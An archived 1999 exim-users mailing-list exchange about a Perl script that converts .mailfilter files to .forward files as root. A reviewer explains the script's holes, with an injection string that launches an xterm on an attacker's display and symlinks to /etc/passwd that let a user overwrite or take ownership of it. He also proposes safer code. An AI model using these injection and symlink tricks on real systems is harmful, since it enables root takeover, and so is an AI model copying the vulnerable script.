Re: [EXIM] .mailfilter to .forward

Pàgina inicial
Delete this message
Reply to this message
Autor: Kevin J Collins
Data:  
A: Malcolm Beattie
CC: exim-users
Assumpte: Re: [EXIM] .mailfilter to .forward
Hey -

Of COURSE you don't run it on a live server. It's simply a
quick'n'dirty that we ran here when the old system was closed to
users and mail.

Apols to all for omitting this.

:-(

Kevin_C
On Wed, 5 May 1999 14:07:29 +0100 (BST) Malcolm Beattie
<mbeattie@???> wrote:

> Kevin J Collins writes:
> > We've just finished such a move here at Heriot-Watt. Below is
> a > perl script written by our Dave Morriss to achieve the
> > conversion. Dave's quite happy for this to be distributed. It
> > will no doubt need some tailoring to your own needs.
>
> If there's any possibility of malicious (or just mischievous)
> users on the system then don't run this: there are a number of
> security holes, some more easily exploitable than others.
>
> > --- [ dot-forward.pl ] 
> ------------------------------------------- [...]
> >     # Open the .mailfilter file and abort if unable (may not be 
> wise) >     $mfpath = "$mfdir/$mailfilter";
> >     open(MAILFILTER,$mfpath) || die "Unable to open $mfpath: 
> $!\n"; > 
> >     $fwdaddr = ""; > 
> >     # Dig out the information we need from the mailfilter file 
> > while (<MAILFILTER>) { >         if (/^ignore pipe "\S+ 
> ([^"]+)";$/) { >         # Here we have found the filtering 
> info and picked out the >         # destination address
> >         $fwdaddr = $1; >         $fwdpath = "$mfdir/$forward";
> > >         print "$fwdpath => $fwdaddr\n";
> > >         # Create the forward file (or re-create if already 
> existing) >         system("$echo $fwdaddr > $fwdpath");

>
> For a start, $fwdaddr is under user control and putting something
> like     true; xterm -display attacker:0 &; true"
> in the mail filter file will let the user run any command they 
> like as root. Then note that you're using shell redirection as 
> root to redirect output to a name under the user's control. So
>     ln -s /etc/passwd .forward or such like will cause 
> /etc/passwd to be overwritten with the contents of the user's 
> chosen text.

>
> >         # If the file exists change ownership, otherwise complain
> >         if (-f "$fwdpath") {
> >         # New file is owned by the sameuid/gid as .mailfilter
> >             system("$chown $uid.$gid $fwdpath");

>
> This is an even wider hole. A user who does
>     ln -s /etc/passwd .forward
> will then find that /etc/passwd gets chowned to them. Oops.
> (It's also calling out to a separate process instead of simply 
> using chown($uid,$gid,$fwdpath) for some reason.)

>
> Even with all the above fixed, there are still plenty of races in
> between the steps so that a user can have a valid or 
> non-existent .forward one instant and then a symlink pointing 
> somewhere nasty the next. To rewrite this program safely would at 
> the very least need something based on
>     unlink($fwdpath);     sysopen(FWD, $fwdpath, 
> O_CREAT|O_EXCL|O_WRONLY) or ... and (unless you want to mess 
> about with fchown() which isn't very portable and may be tricky 
> from Perl), do the whole thing after doing something like
>     $) = "$gid $gid";     $> = $uid;
> and ensure you do all the user's file manipulation with only 
> the privileges of the user.

>
> --Malcolm
>
> --
> Malcolm Beattie <mbeattie@???> Unix Systems Programmer
> Oxford University Computing Services
>
> --
> *** Exim information can be found at http://www.exim.org/ ***
>


__________________________________________________________________
Kevin Collins, Computing Services     | Tel.   +44 (0)131 451 3265
Heriot-Watt University, EDINBURGH     | Fax.   +44 (0)131 451 3261
Scotland, UK.  EH14 4AS               | K.J.Collins@???



--
*** Exim information can be found at http://www.exim.org/ ***